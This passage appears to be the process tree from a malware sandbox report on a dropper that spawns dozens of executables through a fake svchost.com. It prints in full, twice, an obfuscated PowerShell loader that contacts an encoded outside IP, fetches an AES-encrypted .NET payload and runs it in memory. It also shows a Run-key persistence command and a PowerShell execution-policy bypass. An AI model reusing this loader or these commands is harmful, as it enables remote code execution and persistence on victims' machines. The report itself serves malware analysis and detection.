        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        9⤵
        
        PID:6500
        
        C:\Windows\svchost.exe
        
        "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        10⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        11⤵
        
        PID:3128
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        12⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        13⤵
        
        PID:1768
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        14⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        15⤵
        
        PID:7516
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        16⤵
        
        PID:712
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        17⤵
        
        PID:5728
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        18⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        19⤵
        
        PID:8028
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\BROOMS~1.EXE"
      4⤵
      PID:7284
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\BROOMS~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\BROOMS~1.EXE
        5⤵
        
        PID:5388
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\install.exe"
      4⤵
      PID:5420
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\install.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\install.exe
        5⤵
        
        PID:3632
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:7596
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5328
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:408
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:7808
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:7568
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:7652
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe"
      4⤵
      PID:5124
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe
        5⤵
        
        PID:7988
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U65W0~1.EXE"
        6⤵
        
        PID:8092
        
        C:\Users\Admin\AppData\Local\Temp\U65W0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U65W0~1.EXE
        7⤵
        
        PID:5916
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U65W1~1.EXE"
        6⤵
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\U65W1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U65W1~1.EXE
        7⤵
        
        PID:7784
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\random.exe"
      4⤵
      PID:7248
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\random.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\random.exe
        5⤵
        
        PID:408
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pinguin.exe"
      4⤵
      PID:7348
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pinguin.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pinguin.exe
        5⤵
        
        PID:3188
    - - C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
        
        C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
        5⤵
        
        PID:7368
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        
        PID:6332
        
        C:\Windows\System32\certutil.exe
        
        C:\Windows\System32\certutil.exe
        7⤵
        
        PID:60
        
        C:\Windows\explorer.exe
        
        explorer.exe
        8⤵
        
        PID:10664
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Point.exe"
      4⤵
      PID:5660
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Point.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Point.exe
        5⤵
        
        PID:5316
      - C:\Windows\SysWOW64\ctfmon.exe
        
        "C:\Windows\SysWOW64\ctfmon.exe -p 1234"
        6⤵
        
        PID:6152
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wininit.exe"
      4⤵
      PID:7504
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wininit.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wininit.exe
        5⤵
        
        PID:6708
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GOLDPR~1.EXE"
      4⤵
      PID:3432
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GOLDPR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GOLDPR~1.EXE
        5⤵
        
        PID:5664
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3176
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4704
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe"
      4⤵
      PID:2796
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe
        5⤵
        
        PID:6228
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\gookcom.exe"
      4⤵
      PID:5124
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\gookcom.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\gookcom.exe
        5⤵
        
        PID:3076
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);
        6⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);
        7⤵
        
        PID:6032
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VBNHTL~1.EXE"
      4⤵
      PID:392
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VBNHTL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VBNHTL~1.EXE
        5⤵
        
        PID:8160
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe"
      4⤵
      PID:3604
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe
        5⤵
        
        PID:7068
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        6⤵
        
        PID:7720
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
        6⤵
        
        PID:7268
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\AUTOKEY.exe"
      4⤵
      PID:4684
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\AUTOKEY.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\AUTOKEY.exe
        5⤵
        
        PID:6212
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex1234.exe"
      4⤵
      PID:6196
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex1234.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex1234.exe
        5⤵
        
        PID:6308
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:7588
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6864
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:284
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe"
        7⤵
        
        PID:1816
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe
        8⤵
        
        PID:7484
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe"
        7⤵
        
        PID:8080
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe
        8⤵
        
        PID:8068
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe"
      4⤵
      PID:2472
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe
        5⤵
        
        PID:7232
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PPARET~1.EXE"
      4⤵
      PID:304
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PPARET~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PPARET~1.EXE
        5⤵
        
        PID:4844
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE"
      4⤵
      PID:6376
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE
        5⤵
        
        PID:3788
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4788
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:8168
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5660
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE"
      4⤵
      PID:7788
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE
        5⤵
        
        PID:392
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -nologo -noprofile -noninteractive -executionpolicy bypass -command .\serverBrowser.ps1
        6⤵
        
        PID:5176
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pgp-Soft.exe"
      4⤵
      PID:7208
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pgp-Soft.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pgp-Soft.exe
        5⤵
        
        PID:7400
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ckz_84XS\nds.exe"
        6⤵
        
        PID:3124
        
        C:\Users\Admin\AppData\Local\Temp\ckz_84XS\nds.exe
        
        C:\Users\Admin\AppData\Local\Temp\ckz_84XS\nds.exe
        7⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\ckz_84XS\nds.exe
        
        C:\Users\Admin\AppData\Local\Temp\ckz_84XS\nds.exe
        8⤵
        
        PID:9100
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Eszop.exe"
      4⤵
      PID:4316
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Eszop.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Eszop.exe
        5⤵
        
        PID:3076
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe"
      4⤵
      PID:5540
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe
        5⤵
        
        PID:6652
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe
        6⤵
        
        PID:7584
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypt.exe"
      4⤵
      PID:5648
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypt.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypt.exe
        5⤵
        
        PID:2404
      - C:\Windows\SysWOW64\wscript.exe
        
        "wscript.exe" "C:\Users\Admin\start.vbs"
        6⤵
        
        PID:7084
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe"
      4⤵
      PID:7256
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
        5⤵
        
        PID:6704
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe"
      4⤵
      PID:8112
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe
        5⤵
        
        PID:1044
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe
        6⤵
        
        PID:7464
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Update.exe"
      4⤵
      PID:4432
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Update.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Update.exe
        5⤵
        
        PID:6672
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe"
      4⤵
      PID:936
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe
        5⤵
        
        PID:5532
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\peinf.exe"
      4⤵
      PID:2404
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\peinf.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\peinf.exe
        5⤵
        
        PID:3144
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\afile.exe"
      4⤵
      PID:8080
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\afile.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\afile.exe
        5⤵
        
        PID:5716
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6700
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NICEEY~1.EXE"
      4⤵
      PID:5412
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NICEEY~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NICEEY~1.EXE
        5⤵
        
        PID:8360
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
        6⤵
        
        PID:8656
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\control.exe"
      4⤵
      PID:13436
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\control.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\control.exe
        5⤵
        
        PID:14616
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
    "bot.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
      4⤵
      Executes dropped EXE
      PID:1532
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
        5⤵
        
        PID:2912
      - C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        6⤵
        
        PID:712
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        7⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        8⤵
        
        PID:2996
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        9⤵
        
        PID:4588
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4588 CREDAT:82945 /prefetch:2
        10⤵
        
        PID:396
        
        C:\Program Files (x86)\Microsoft\DesktopLayer.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
        8⤵
        
        PID:3928
        
        C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
        9⤵
        
        PID:5336
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        10⤵
        
        PID:5916
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5916 CREDAT:82945 /prefetch:2
        11⤵
        
        PID:4176
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        9⤵
        
        PID:5712
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5712 CREDAT:82945 /prefetch:2
        10⤵
        
        PID:32
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\7DCB.tmp\splitterrypted.vbs
        7⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\7DCB.tmp\splitterrypted.vbs
        8⤵
        
        PID:5188
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
        5⤵
        
        PID:5248
      - C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        6⤵
        
        PID:5264
        
        C:\Windows\svchost.com
